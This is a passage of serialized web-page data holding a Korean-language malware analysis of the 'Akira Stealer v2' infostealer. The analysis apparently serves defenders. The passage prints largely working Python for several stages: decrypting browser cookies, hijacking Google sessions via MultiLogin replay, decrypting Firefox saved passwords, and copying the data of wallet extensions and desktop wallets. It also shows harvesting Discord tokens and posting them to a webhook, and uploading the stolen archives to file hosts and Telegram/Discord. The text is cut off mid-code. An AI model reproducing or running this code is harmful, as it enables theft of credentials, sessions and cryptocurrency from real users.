(IV)\n",[1679,7295,7296],{"class":1681,"line":5112},[1679,7297,7298],{},"    # [15:-16] = ciphertext payload\n",[1679,7300,7301],{"class":1681,"line":5778},[1679,7302,7303],{},"    # [-16:]   = GCM authentication tag\n",[1679,7305,7306],{"class":1681,"line":5783},[1679,7307,7308],{},"    iv = buffer[3:15]\n",[1679,7310,7311],{"class":1681,"line":5788},[1679,7312,7313],{},"    ciphertext = buffer[15:-16]\n",[1679,7315,7316],{"class":1681,"line":5793},[1679,7317,7318],{},"    tag = buffer[-16:]\n",[1679,7320,7321],{"class":1681,"line":5799},[1679,7322,3845],{"emptyLinePlaceholder":325},[1679,7324,7325],{"class":1681,"line":5804},[1679,7326,7327],{},"    # Initialize AES-GCM cipher with extracted IV and tag\n",[1679,7329,7330],{"class":1681,"line":5809},[1679,7331,7332],{},"    cipher = Cipher(\n",[1679,7334,7335],{"class":1681,"line":5814},[1679,7336,7337],{},"        algorithms.AES(key),\n",[1679,7339,7340],{"class":1681,"line":5819},[1679,7341,7342],{},"        modes.GCM(iv, tag),\n",[1679,7344,7345],{"class":1681,"line":5824},[1679,7346,7347],{},"        backend=default_backend()\n",[1679,7349,7350],{"class":1681,"line":5829},[1679,7351,5958],{},[1679,7353,7354],{"class":1681,"line":5835},[1679,7355,7356],{},"    decryptor = cipher.decryptor()\n",[1679,7358,7359],{"class":1681,"line":5841},[1679,7360,3845],{"emptyLinePlaceholder":325},[1679,7362,7363],{"class":1681,"line":5847},[1679,7364,7365],{},"    # Perform decryption; raises if authentication fails\n",[1679,7367,7368],{"class":1681,"line":5852},[1679,7369,7370],{},"    plaintext = decryptor.update(ciphertext) + decryptor.finalize()\n",[1679,7372,7373],{"class":1681,"line":5857},[1679,7374,3845],{"emptyLinePlaceholder":325},[1679,7376,7377],{"class":1681,"line":5862},[1679,7378,7379],{},"    # Decode to UTF-8, ignoring any stray errors\n",[1679,7381,7382],{"class":1681,"line":5867},[1679,7383,7384],{},"    return plaintext.decode('utf-8', errors='ignore')\n",[713,7386,7388],{"id":7387},"_76-세션-토큰-하이재킹","7.6 세션 토큰 하이재킹",[532,7390,719],{},[532,7392,7393,7394,7397],{},"Akira는 수동적 데이터 수집에서 멈추지 않습니다. 라이브 세션 토큰을 능동적으로 하이재킹하여 실시간으로 피해자를 사칭합니다. 브라우저 저장소에서 암호화된 토큰을 추출한 뒤, 필요한 인증 헤더를 재구성하고 Google의 OAuth 엔드포인트에 대해 ",[539,7395,7396],{},"MultiLogin"," 요청을 리플레이합니다. 아래 코드 스니펫이 이 과정을 보여 줍니다:",[587,7399,7401],{"className":4489,"code":7400,"language":4491,"meta":593,"style":593},"# Build SAPISIDHASH header for Google services\norigin = \"https://accounts.google.com\"\ntimestamp = int(time.time())\n# Compute SHA1 of \"timestamp origin SAPISID\"\npayload = f\"{timestamp} {origin} {sap_id_cookie}\".encode()\nsignature = hashlib.sha1(payload).hexdigest()\nheaders = {\n    \"Authorization\": f\"SAPISIDHASH {timestamp}_{signature}\",\n    \"Content-Type\": \"application/json\"\n}\n# Replay MultiLogin to fetch valid session cookies\nresponse = requests.post(\n    \"https://accounts.google.com/accounts/multilogin\",\n    headers=headers,\n    json={\"continue\": \"https://mail.google.com\"}\n)\nif response.status_code == 200:\n    # Victim’s cookies now present in response.cookies\n    hijacked_cookies = response.cookies\n",[550,7402,7403,7408,7413,7418,7423,7428,7433,7438,7443,7448,7452,7457,7462,7467,7472,7477,7481,7486,7491],{"__ignoreMap":593},[1679,7404,7405],{"class":1681,"line":1682},[1679,7406,7407],{},"# Build SAPISIDHASH header for Google services\n",[1679,7409,7410],{"class":1681,"line":2059},[1679,7411,7412],{},"origin = \"https://accounts.google.com\"\n",[1679,7414,7415],{"class":1681,"line":2065},[1679,7416,7417],{},"timestamp = int(time.time())\n",[1679,7419,7420],{"class":1681,"line":2071},[1679,7421,7422],{},"# Compute SHA1 of \"timestamp origin SAPISID\"\n",[1679,7424,7425],{"class":1681,"line":2393},[1679,7426,7427],{},"payload = f\"{timestamp} {origin} {sap_id_cookie}\".encode()\n",[1679,7429,7430],{"class":1681,"line":2399},[1679,7431,7432],{},"signature = hashlib.sha1(payload).hexdigest()\n",[1679,7434,7435],{"class":1681,"line":3055},[1679,7436,7437],{},"headers = {\n",[1679,7439,7440],{"class":1681,"line":3848},[1679,7441,7442],{},"    \"Authorization\": f\"SAPISIDHASH {timestamp}_{signature}\",\n",[1679,7444,7445],{"class":1681,"line":3854},[1679,7446,7447],{},"    \"Content-Type\": \"application/json\"\n",[1679,7449,7450],{"class":1681,"line":4103},[1679,7451,2402],{},[1679,7453,7454],{"class":1681,"line":5028},[1679,7455,7456],{},"# Replay MultiLogin to fetch valid session cookies\n",[1679,7458,7459],{"class":1681,"line":5034},[1679,7460,7461],{},"response = requests.post(\n",[1679,7463,7464],{"class":1681,"line":5040},[1679,7465,7466],{},"    \"https://accounts.google.com/accounts/multilogin\",\n",[1679,7468,7469],{"class":1681,"line":5046},[1679,7470,7471],{},"    headers=headers,\n",[1679,7473,7474],{"class":1681,"line":5052},[1679,7475,7476],{},"    json={\"continue\": \"https://mail.google.com\"}\n",[1679,7478,7479],{"class":1681,"line":5058},[1679,7480,5246],{},[1679,7482,7483],{"class":1681,"line":5064},[1679,7484,7485],{},"if response.status_code == 200:\n",[1679,7487,7488],{"class":1681,"line":5070},[1679,7489,7490],{},"    # Victim’s cookies now present in response.cookies\n",[1679,7492,7493],{"class":1681,"line":5076},[1679,7494,7495],{},"    hijacked_cookies = response.cookies\n",[532,7497,7498],{},"이 요청을 리플레이함으로써, Akira는 유효한 세션으로 보호되는 사용자의 Gmail, Drive, 또는 기타 모든 Google 서비스를 자격 증명 없이 사칭할 수 있습니다. 이 기법은 Google 자체의 토큰 수용 로직을 활용하므로, 정상 클라이언트 동작과 거의 구별할 수 없게 만듭니다.",[713,7500,7502],{"id":7501},"_77-firefox-복호화","7.7 Firefox 복호화",[532,7504,719],{},[532,7506,7507,7508,7511],{},"Firefox 같은 Gecko 기반 브라우저는 ",[550,7509,7510],{},"key4.db","에 저장된 마스터 키를 사용해 저장된 자격 증명과 쿠키를 암호화합니다. Akira에는 Mozilla의 NSS 로직을 반영한 간소화된 복호화 루틴이 포함되어 있으며, 마스터 암호 프롬프트를 트리거하지 않고 3DES와 AES-CBC 변형을 모두 처리합니다. 사용 예시:",[587,7513,7515],{"className":4489,"code":7514,"language":4491,"meta":593,"style":593},"# Load global Salt and encrypted item from key4.db\ndb = sqlite3.connect(profile_path + \"/key4.db\")\ncursor = db.cursor()\ncursor.execute(\"SELECT item1, item2 FROM metadata WHERE id = 'password'\")\nglobal_salt, item2 = cursor.fetchone()\n\n# Decode DER structure and derive key\ndecoded, _ = der_decode(item2)\nentry_salt = decoded[0][1][0].asOctets()\ncipher_text = decoded[1].asOctets()\n# Derive 3DES key\nkey = derive_3des_key(global_salt, master_password, entry_salt)\niv = decoded[0][1][1].asOctets()\n# Decrypt credentials\ncipher = DES3.new(key, DES3.MODE_CBC, iv)\nclear_password = unpad(cipher.decrypt(cipher_text))\n\nprint(\"Decrypted Firefox password:\", clear_password)\n",[550,7516,7517,7522,7527,7532,7537,7542,7546,7551,7556,7561,7566,7571,7576,7581,7586,7591,7596,7600],{"__ignoreMap":593},[1679,7518,7519],{"class":1681,"line":1682},[1679,7520,7521],{},"# Load global Salt and encrypted item from key4.db\n",[1679,7523,7524],{"class":1681,"line":2059},[1679,7525,7526],{},"db = sqlite3.connect(profile_path + \"/key4.db\")\n",[1679,7528,7529],{"class":1681,"line":2065},[1679,7530,7531],{},"cursor = db.cursor()\n",[1679,7533,7534],{"class":1681,"line":2071},[1679,7535,7536],{},"cursor.execute(\"SELECT item1, item2 FROM metadata WHERE id = 'password'\")\n",[1679,7538,7539],{"class":1681,"line":2393},[1679,7540,7541],{},"global_salt, item2 = cursor.fetchone()\n",[1679,7543,7544],{"class":1681,"line":2399},[1679,7545,3845],{"emptyLinePlaceholder":325},[1679,7547,7548],{"class":1681,"line":3055},[1679,7549,7550],{},"# Decode DER structure and derive key\n",[1679,7552,7553],{"class":1681,"line":3848},[1679,7554,7555],{},"decoded, _ = der_decode(item2)\n",[1679,7557,7558],{"class":1681,"line":3854},[1679,7559,7560],{},"entry_salt = decoded[0][1][0].asOctets()\n",[1679,7562,7563],{"class":1681,"line":4103},[1679,7564,7565],{},"cipher_text = decoded[1].asOctets()\n",[1679,7567,7568],{"class":1681,"line":5028},[1679,7569,7570],{},"# Derive 3DES key\n",[1679,7572,7573],{"class":1681,"line":5034},[1679,7574,7575],{},"key = derive_3des_key(global_salt, master_password, entry_salt)\n",[1679,7577,7578],{"class":1681,"line":5040},[1679,7579,7580],{},"iv = decoded[0][1][1].asOctets()\n",[1679,7582,7583],{"class":1681,"line":5046},[1679,7584,7585],{},"# Decrypt credentials\n",[1679,7587,7588],{"class":1681,"line":5052},[1679,7589,7590],{},"cipher = DES3.new(key, DES3.MODE_CBC, iv)\n",[1679,7592,7593],{"class":1681,"line":5058},[1679,7594,7595],{},"clear_password = unpad(cipher.decrypt(cipher_text))\n",[1679,7597,7598],{"class":1681,"line":5064},[1679,7599,3845],{"emptyLinePlaceholder":325},[1679,7601,7602],{"class":1681,"line":5070},[1679,7603,7604],{},"print(\"Decrypted Firefox password:\", clear_password)\n",[532,7606,7607,7608,619,7610,619,7612,7614],{},"이 루틴으로 Akira는 각 Firefox 프로필에 대해 ",[550,7609,7005],{},[550,7611,7008],{},[550,7613,7011],{},"를 투명하게 덤프하고, 복호화된 출력을 다음에 기록할 수 있습니다:",[587,7616,7619],{"className":7617,"code":7618,"language":592},[590],"Passwords/Firefox_\u003CProfileName> Passwords.txt\nCookies/Firefox_\u003CProfileName> Cookies.txt\nHistory/Firefox_\u003CProfileName> History.txt\n",[550,7620,7618],{"__ignoreMap":593},[532,7622,7623],{},"이 접근은 사용자 수준의 마스터 암호 검사를 우회하여, 스틸러가 저장된 모든 자격 증명에 제약 없이 접근할 수 있게 합니다.*",[532,7625,7626],{},[539,7627,7628],{},"4. 파일 구조 및 명명",[587,7630,7633],{"className":7631,"code":7632,"language":592,"meta":593},[590],"\u003CComputerName>.zip\n└── \u003CComputerName>\\\n    ├── Passwords\\\n    │   ├── Chrome Passwords.txt\n    │   ├── Edge Passwords.txt\n    │   └── …\n    ├── Cookies\\\n    │   ├── Chrome Cookies.txt\n    │   ├── Edge Cookies.txt\n    │   ├── user@example.com Google Session.txt\n    │   └── …\n    ├── CreditCards\\\n    │   ├── Chrome CreditCards.txt\n    │   └── …\n    ├── History\\\n    │   ├── Chrome History.txt\n    │   └── …\n    ├── Autofill\\\n    │   ├── Chrome Autofill.txt\n    │   └── …\n    └── Wallets\\\n        ├── Firefox_Default_profiles.zip\n        ├── Firefox_Profile1_profiles.zip\n        └── …\n",[550,7634,7632],{"__ignoreMap":593},[603,7636,7637,7651,7657],{},[606,7638,6488,7639,7642,7643,7646,7647,7650],{},[550,7640,7641],{},".txt","는 일관된 헤더(",[550,7644,7645],{},"\u003C================[Akira Stealer v2]>================>",")와 구분선(",[550,7648,7649],{},"====…====",")으로 시작합니다.",[606,7652,7653,7654,2121],{},"디스크상 ZIP: ",[550,7655,7656],{},"%TEMP%\\\u003CComputerName>.zip",[606,7658,7659,7660,2121],{},"C&C 파일명 레이블: ",[550,7661,7662],{},"Akira-\u003Cusername>.zip",[532,7664,7665],{},[539,7666,7667],{},"5. 유출 및 정리",[587,7669,7671],{"className":4489,"code":7670,"language":4491,"meta":593,"style":593},"url = Webhook.uploadToGofile(zip_path)\nif not url:\n    url = Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\nWebhook.sendDataTG(zip_path, chatId, startup)\nUtils.clear_client_folder()\n",[550,7672,7673,7678,7683,7688,7693],{"__ignoreMap":593},[1679,7674,7675],{"class":1681,"line":1682},[1679,7676,7677],{},"url = Webhook.uploadToGofile(zip_path)\n",[1679,7679,7680],{"class":1681,"line":2059},[1679,7681,7682],{},"if not url:\n",[1679,7684,7685],{"class":1681,"line":2065},[1679,7686,7687],{},"    url = Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\n",[1679,7689,7690],{"class":1681,"line":2071},[1679,7691,7692],{},"Webhook.sendDataTG(zip_path, chatId, startup)\n",[1679,7694,7695],{"class":1681,"line":2393},[1679,7696,7697],{},"Utils.clear_client_folder()\n",[603,7699,7700,7710,7724,7741],{},[606,7701,7702,7705,7706,7709],{},[539,7703,7704],{},"기본 채널(GoFile.io):"," 멀웨어는 먼저 탈취한 모든 아티팩트를 담은 ZIP 아카이브를 GoFile.io에 업로드하려고 시도하며, JSON 응답에서 공격자에게 아카이브에 대한 직접 접근을 부여하는 ",[550,7707,7708],{},"downloadPage"," URL을 파싱합니다.",[606,7711,7712,7715,7716,7719,7720,7723],{},[539,7713,7714],{},"자동 대체:"," GoFile 엔드포인트가 실패하면(네트워크 타임아웃, 속도 제한 등), 코드는 원활하게 ",[550,7717,7718],{},"file.io","로 되돌아가고, 그것마저 빈 링크를 반환하면 마지막으로 ",[550,7721,7722],{},"oshi.at","로 넘어갑니다. 두 대안 모두 예외를 발생시키지 않고 호출되어, 세 서비스 중 하나는 항상 순차적으로 시도되도록 보장합니다.",[606,7725,7726,7729,7730,7733,7734,619,7737,7740],{},[539,7727,7728],{},"웹훅 보고:"," URL(또는 지속적 실패 시 빈 문자열)이 결정되면, ",[550,7731,7732],{},"Webhook.sendDataTG(...)","가 호출되어 다운로드 링크, 머신 식별자(",[550,7735,7736],{},"chatId",[550,7738,7739],{},"startup"," 플래그), 모든 범주 개수(암호, 쿠키, 자동 완성, 지갑)를 하나의 Discord 또는 Telegram 메시지로 묶습니다.",[606,7742,7743,7746,7747,7750],{},[539,7744,7745],{},"즉각적 정리:"," 보고 후, ",[550,7748,7749],{},"Utils.clear_client_folder()","가 전체 임시 작업 공간과 ZIP 파일 자체를 재귀적으로 삭제하여, 수집된 데이터나 아카이브의 흔적을 디스크에 남기지 않습니다.",[820,7752,7753,7758],{},[532,7754,7755],{},[539,7756,7757],{},"실패 복원력:",[603,7759,7760,7767],{},[606,7761,7762,7763,7766],{},"모든 업로드 루틴은 실패 시 예외를 던지는 대신 ",[550,7764,7765],{},"\"\"","를 반환하여, 코드 흐름이 계속되도록 보장합니다.",[606,7768,7769],{},"모든 서비스에 도달할 수 없더라도, 멀웨어는 로컬 아티팩트를 지우기 전에 여전히 웹훅 보고를 전송하며(링크가 누락된 채로라도), 프로세스가 예기치 않게 충돌하지 않는 한 포렌식 잔여물을 최소화합니다.",[826,7771],{"className":7772},[829,830],[532,7774,7775],{},[539,7776,7777],{},"6. 견고성 및 오류 처리",[603,7779,7780,7797,7803,7812],{},[606,7781,7782,3256,7785,7788,7789,7792,7793,7796],{},[539,7783,7784],{},"세분화된 예외 처리:",[550,7786,7787],{},"shutil.copy",", SQLite 쿼리, ZIP 작업 등 모든 파일 시스템 상호작용은 ",[550,7790,7791],{},"try/except"," 블록으로 감싸집니다. 오류가 발생하면(잠긴 DB, 권한 거부, 잘못된 레코드), 예외가 포착되어 ",[550,7794,7795],{},"Akira.logErrorTg()","를 통해 로깅되고 실행이 계속되어, 실패를 해당 특정 파일이나 모듈로 격리합니다.",[606,7798,7799,7802],{},[539,7800,7801],{},"브라우저별 스레드 격리:"," 지원되는 각 브라우저의 추출 루틴은 자체 스레드에서 실행됩니다. 이 멀티스레드 설계는 한 브라우저 추출의 충돌이나 교착(예: 손상된 프로필, 누락된 키)이 다른 브라우저의 분석을 중단하거나 지연시키지 않도록 보장합니다.",[606,7804,7805,7808,7809,7811],{},[539,7806,7807],{},"조용한 대체 및 기본값:"," 대체 파일 호스트 업로드, 원격 리소스 확인, 하위 프로세스 생성 같은 많은 보조 루틴은 표면적 경고 없이 중첩된 ",[550,7810,7791],{},"를 사용하여 은닉성을 극대화합니다. 기본값(빈 문자열, 불리언)은 흐름을 중단 없이 유지하고 명백한 오류 조건을 제거하도록 선택됩니다.",[606,7813,7814,7817,7818,7821,7822,7825],{},[539,7815,7816],{},"뮤텍스 및 시작 가드:"," 명명된 뮤텍스(",[550,7819,7820],{},"1qsMlseJplTlArIF14f",")가 다중 인스턴스를 방지하고, 레지스트리 검사와 ",[550,7823,7824],{},"Utils.CreateMutex()","가 동시 실행을 방지하여 실제 배포 중 추가적인 안정성을 제공합니다.",[713,7827,7829],{"id":7828},"_78-지갑-및-토큰-유출","7.8 지갑 및 토큰 유출",[532,7831,719],{},[532,7833,7834],{},"이 단계에서 Akira Stealer v2는 브라우저 확장, 데스크톱 지갑, 메시징 토큰, 라이브 키로깅에 걸쳐 암호화폐 자격 증명과 세션 토큰에 대한 가장 포괄적인 훑기를 수행합니다. 병렬 스레드로 실행되어 어떤 벡터도 놓치지 않도록 보장합니다. 아래는 코드로 뒷받침된 단계별 심층 분석입니다.",[861,7836,7838],{"id":7837},"_781-브라우저-확장-지갑","7.8.1 브라우저 확장 지갑",[532,7840,867],{},[532,7842,7843,7846],{},[539,7844,7845],{},"표적:"," MetaMask, Phantom, Trust Wallet, Coinbase Wallet, Solflare, Exodus, Binance Chain Wallet, Keplr, Nami, TronLink, Rabby, Talisman 등 인기 브라우저 전반의 80개 이상 확장.",[587,7848,7850],{"className":4489,"code":7849,"language":4491,"meta":593,"style":593},"# Hardcoded list of extension IDs and human-friendly names\nwalletsExtensions = [\n    [\"MetaMask\",        \"nkbihfbeogaeaoehlefnkodbefgpgknn\"],\n    [\"Phantom\",         \"bfnaelmomeimhlpmgjnjophhpkkoljpa\"],\n    [\"TrustWallet\",     \"egjidjbpglichdcondbcbdnbeeppgdph\"],\n    [\"CoinbaseWallet\",  \"hfhmhopkfngkjcalldmaepmpilmjjemb\"],\n    [\"Solflare\",        \"bhhhlbepdkbapadjdnnojkbgioiodbic\"],\n    [\"BinanceChain\",    \"fhbohimaelbohpjbbldcngcnapndodjp\"],\n    [\"Keplr\",           \"dmkamcknogkgcdfhhbddcghachkejeap\"],\n    [\"Nami\",            \"lpfcbjknijpeeillifnkikgncikgfhdo\"],\n    [\"Talisman\",        \"fijngjgcjhjmmpcmkeiomlglpeiijkld\"],\n    [\"TronLink\",        \"ibnejdfjmmkpcnlpebklmnkoeoihofec\"],\n    # ... plus dozens more mapped in code\n]\n# Extraction loop for each browser profile\nfor browser_name, (user_data, proc_name) in paths.items():\n    base = os.path.join(user_data, \"Default\", \"Local Extension Settings\")\n    for ext_name, ext_id in walletsExtensions:\n        src = os.path.join(base, ext_id)\n        if os.path.isdir(src):\n            dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", f\"{ext_name}_{browser_name}\")\n            shutil.copytree(src, dest, dirs_exist_ok=True)\n            data.ext_wallets_count += 1\n",[550,7851,7852,7857,7862,7867,7872,7877,7882,7887,7892,7897,7902,7907,7912,7917,7922,7927,7932,7937,7942,7947,7952,7957,7962],{"__ignoreMap":593},[1679,7853,7854],{"class":1681,"line":1682},[1679,7855,7856],{},"# Hardcoded list of extension IDs and human-friendly names\n",[1679,7858,7859],{"class":1681,"line":2059},[1679,7860,7861],{},"walletsExtensions = [\n",[1679,7863,7864],{"class":1681,"line":2065},[1679,7865,7866],{},"    [\"MetaMask\",        \"nkbihfbeogaeaoehlefnkodbefgpgknn\"],\n",[1679,7868,7869],{"class":1681,"line":2071},[1679,7870,7871],{},"    [\"Phantom\",         \"bfnaelmomeimhlpmgjnjophhpkkoljpa\"],\n",[1679,7873,7874],{"class":1681,"line":2393},[1679,7875,7876],{},"    [\"TrustWallet\",     \"egjidjbpglichdcondbcbdnbeeppgdph\"],\n",[1679,7878,7879],{"class":1681,"line":2399},[1679,7880,7881],{},"    [\"CoinbaseWallet\",  \"hfhmhopkfngkjcalldmaepmpilmjjemb\"],\n",[1679,7883,7884],{"class":1681,"line":3055},[1679,7885,7886],{},"    [\"Solflare\",        \"bhhhlbepdkbapadjdnnojkbgioiodbic\"],\n",[1679,7888,7889],{"class":1681,"line":3848},[1679,7890,7891],{},"    [\"BinanceChain\",    \"fhbohimaelbohpjbbldcngcnapndodjp\"],\n",[1679,7893,7894],{"class":1681,"line":3854},[1679,7895,7896],{},"    [\"Keplr\",           \"dmkamcknogkgcdfhhbddcghachkejeap\"],\n",[1679,7898,7899],{"class":1681,"line":4103},[1679,7900,7901],{},"    [\"Nami\",            \"lpfcbjknijpeeillifnkikgncikgfhdo\"],\n",[1679,7903,7904],{"class":1681,"line":5028},[1679,7905,7906],{},"    [\"Talisman\",        \"fijngjgcjhjmmpcmkeiomlglpeiijkld\"],\n",[1679,7908,7909],{"class":1681,"line":5034},[1679,7910,7911],{},"    [\"TronLink\",        \"ibnejdfjmmkpcnlpebklmnkoeoihofec\"],\n",[1679,7913,7914],{"class":1681,"line":5040},[1679,7915,7916],{},"    # ... plus dozens more mapped in code\n",[1679,7918,7919],{"class":1681,"line":5046},[1679,7920,7921],{},"]\n",[1679,7923,7924],{"class":1681,"line":5052},[1679,7925,7926],{},"# Extraction loop for each browser profile\n",[1679,7928,7929],{"class":1681,"line":5058},[1679,7930,7931],{},"for browser_name, (user_data, proc_name) in paths.items():\n",[1679,7933,7934],{"class":1681,"line":5064},[1679,7935,7936],{},"    base = os.path.join(user_data, \"Default\", \"Local Extension Settings\")\n",[1679,7938,7939],{"class":1681,"line":5070},[1679,7940,7941],{},"    for ext_name, ext_id in walletsExtensions:\n",[1679,7943,7944],{"class":1681,"line":5076},[1679,7945,7946],{},"        src = os.path.join(base, ext_id)\n",[1679,7948,7949],{"class":1681,"line":5082},[1679,7950,7951],{},"        if os.path.isdir(src):\n",[1679,7953,7954],{"class":1681,"line":5088},[1679,7955,7956],{},"            dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", f\"{ext_name}_{browser_name}\")\n",[1679,7958,7959],{"class":1681,"line":5094},[1679,7960,7961],{},"            shutil.copytree(src, dest, dirs_exist_ok=True)\n",[1679,7963,7964],{"class":1681,"line":5100},[1679,7965,7966],{},"            data.ext_wallets_count += 1\n",[603,7968,7969,7975],{},[606,7970,7971,7974],{},[539,7972,7973],{},"복사되는 파일",": 암호화된 키, 시드 문구, 로그인 자격 증명을 담은 확장별 IndexedDB, LevelDB, JSON 및 구성 파일.",[606,7976,7977,974,7980,619,7983,7986],{},[539,7978,7979],{},"결과 폴더",[550,7981,7982],{},"Wallets/MetaMask_Chrome/",[550,7984,7985],{},"Wallets/Phantom_Edge/"," 등.",[861,7988,7990],{"id":7989},"_782-데스크톱-지갑-애플리케이션","7.8.2 데스크톱 지갑 애플리케이션",[532,7992,867],{},[532,7994,7995,7997],{},[539,7996,7845],{}," Electrum, Exodus, Atomic Wallet, Guarda, Rabby, Coinomi, Zcash, Armory, Bytecoin, Jaxx, Coinomi 등 주요 데스크톱 클라이언트.",[587,7999,8001],{"className":4489,"code":8000,"language":4491,"meta":593,"style":593},"walletsDesktop = [\n    [\"Electrum\",     os.path.join(os.getenv('APPDATA'), \"Electrum\", \"wallets\")],\n    [\"Exodus\",       os.path.join(os.getenv('APPDATA'), \"Exodus\", \"exodus.wallet\")],\n    [\"AtomicWallet\", os.path.join(os.getenv('LOCALAPPDATA'), \"atomic\", \"Local Storage\", \"leveldb\")],\n    [\"Guarda\",       os.path.join(os.getenv('APPDATA'), \"Guarda\", \"Local Storage\", \"leveldb\")],\n    [\"Rabby\",        os.path.join(os.getenv('APPDATA'), \"rabby-desktop\")],\n    [\"Coinomi\",      os.path.join(os.getenv('APPDATA'), \"Coinomi\", \"wallets\")],\n]\nfor name, path in walletsDesktop:\n    if os.path.isdir(path):\n        Utils.TaskKill(name.lower())\n        dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", name)\n        shutil.copytree(path, dest, dirs_exist_ok=True)\n        data.desktop_wallets_count += 1\n",[550,8002,8003,8008,8013,8018,8023,8028,8033,8038,8042,8047,8052,8057,8062,8067],{"__ignoreMap":593},[1679,8004,8005],{"class":1681,"line":1682},[1679,8006,8007],{},"walletsDesktop = [\n",[1679,8009,8010],{"class":1681,"line":2059},[1679,8011,8012],{},"    [\"Electrum\",     os.path.join(os.getenv('APPDATA'), \"Electrum\", \"wallets\")],\n",[1679,8014,8015],{"class":1681,"line":2065},[1679,8016,8017],{},"    [\"Exodus\",       os.path.join(os.getenv('APPDATA'), \"Exodus\", \"exodus.wallet\")],\n",[1679,8019,8020],{"class":1681,"line":2071},[1679,8021,8022],{},"    [\"AtomicWallet\", os.path.join(os.getenv('LOCALAPPDATA'), \"atomic\", \"Local Storage\", \"leveldb\")],\n",[1679,8024,8025],{"class":1681,"line":2393},[1679,8026,8027],{},"    [\"Guarda\",       os.path.join(os.getenv('APPDATA'), \"Guarda\", \"Local Storage\", \"leveldb\")],\n",[1679,8029,8030],{"class":1681,"line":2399},[1679,8031,8032],{},"    [\"Rabby\",        os.path.join(os.getenv('APPDATA'), \"rabby-desktop\")],\n",[1679,8034,8035],{"class":1681,"line":3055},[1679,8036,8037],{},"    [\"Coinomi\",      os.path.join(os.getenv('APPDATA'), \"Coinomi\", \"wallets\")],\n",[1679,8039,8040],{"class":1681,"line":3848},[1679,8041,7921],{},[1679,8043,8044],{"class":1681,"line":3854},[1679,8045,8046],{},"for name, path in walletsDesktop:\n",[1679,8048,8049],{"class":1681,"line":4103},[1679,8050,8051],{},"    if os.path.isdir(path):\n",[1679,8053,8054],{"class":1681,"line":5028},[1679,8055,8056],{},"        Utils.TaskKill(name.lower())\n",[1679,8058,8059],{"class":1681,"line":5034},[1679,8060,8061],{},"        dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", name)\n",[1679,8063,8064],{"class":1681,"line":5040},[1679,8065,8066],{},"        shutil.copytree(path, dest, dirs_exist_ok=True)\n",[1679,8068,8069],{"class":1681,"line":5046},[1679,8070,8071],{},"        data.desktop_wallets_count += 1\n",[603,8073,8074,8087],{},[606,8075,8076,8079,8080,619,8083,8086],{},[539,8077,8078],{},"탈취되는 데이터",": 키스토어 파일(",[550,8081,8082],{},"*.dat",[550,8084,8085],{},"*.json","), 개인 키 내보내기, 지갑 구성 및 거래 기록.",[606,8088,8089,8092],{},[539,8090,8091],{},"이점",": 공격자가 거래를 승인하는 데 사용할 수 있는 오프라인 지갑 콘텐츠.",[861,8094,8096],{"id":8095},"_783-discord-토큰-수집","7.8.3 Discord 토큰 수집",[532,8098,867],{},[532,8100,8101],{},"Discord 토큰은 인증 아티팩트로, 본질적으로 장기 유효 베어러 토큰이며, 자격 증명이나 MFA 없이도 사용자 계정에 대한 완전한 접근을 부여할 수 있습니다. Akira는 Discord Stable, Canary, PTB(Public Test Build), 심지어 Lightcord 같은 변형 포크를 포함한 다양한 Discord 클라이언트가 저장한 토큰을 찾아 브라우저와 앱 데이터 폴더를 스캔하여 이를 악용합니다.",[532,8103,8104],{},"이 기법은 애플리케이션의 Local Storage 아래 LevelDB 파일을 겨냥합니다. 이곳에는 인증 토큰이 종종 평문으로 남아 있습니다. 정규 표현식을 사용해, 멀웨어는 이 .log 및 .ldb 파일에서 일반 사용자 토큰이나 MFA 활성화 토큰과 일치하는 패턴을 스캔합니다.",[532,8106,8107],{},"신뢰성을 높이고 노이즈를 줄이기 위해, Akira에는 검증 단계가 포함되어 있습니다. 수집한 각 토큰을 사용해 Discord의 /users/@me 엔드포인트에 테스트 요청을 보냅니다. 성공적으로 인증되는(HTTP 200) 토큰만 웹훅을 통해 유출되며, 일반적으로 공격자가 통제하는 Discord 채널로 전송됩니다.",[532,8109,8110],{},"이 방법은 공격자가 실시간으로 Discord 계정을 하이재킹하고, 피해자를 사칭하며, DM과 길드를 긁어오거나, 소셜 엔지니어링을 통해 추가 멀웨어를 배포할 수 있게 합니다. 그것도 로그인 경고를 트리거하지 않고 말입니다.",[587,8112,8114],{"className":4489,"code":8113,"language":4491,"meta":593,"style":593},"import re, requests\npatterns = [\n    r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27,100}\",  # User tokens\n    r\"mfa\\.[\\w-]{84,100}\"                      # MFA tokens\n]\ndef harvest_discord(base, webhook_url):\n    db_dir = os.path.join(base, \"Local Storage\", \"leveldb\")\n    for file in os.listdir(db_dir):\n        if file.endswith(('.log', '.ldb')):\n            for line in open(os.path.join(db_dir, file), errors='ignore'):\n                for pat in patterns:\n                    for token in re.findall(pat, line):\n                        # Verify token\n                        h = {\"Authorization\": token}\n                        r = requests.get(\"https://discordapp.com/api/v9/users/@me\", headers=h)\n                        if r.status_code == 200:\n                            uname = r.json()[\"username\"] + \"#\" + r.json()[\"discriminator\"]\n                            payload = {\"content\": f\"**Discord** {uname}: `{token}`\"}\n                            requests.post(webhook_url, json=payload)\n",[550,8115,8116,8121,8126,8131,8136,8140,8145,8150,8155,8160,8165,8170,8175,8180,8185,8190,8195,8200,8205],{"__ignoreMap":593},[1679,8117,8118],{"class":1681,"line":1682},[1679,8119,8120],{},"import re, requests\n",[1679,8122,8123],{"class":1681,"line":2059},[1679,8124,8125],{},"patterns = [\n",[1679,8127,8128],{"class":1681,"line":2065},[1679,8129,8130],{},"    r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27,100}\",  # User tokens\n",[1679,8132,8133],{"class":1681,"line":2071},[1679,8134,8135],{},"    r\"mfa\\.[\\w-]{84,100}\"                      # MFA tokens\n",[1679,8137,8138],{"class":1681,"line":2393},[1679,8139,7921],{},[1679,8141,8142],{"class":1681,"line":2399},[1679,8143,8144],{},"def harvest_discord(base, webhook_url):\n",[1679,8146,8147],{"class":1681,"line":3055},[1679,8148,8149],{},"    db_dir = os.path.join(base, \"Local Storage\", \"leveldb\")\n",[1679,8151,8152],{"class":1681,"line":3848},[1679,8153,8154],{},"    for file in 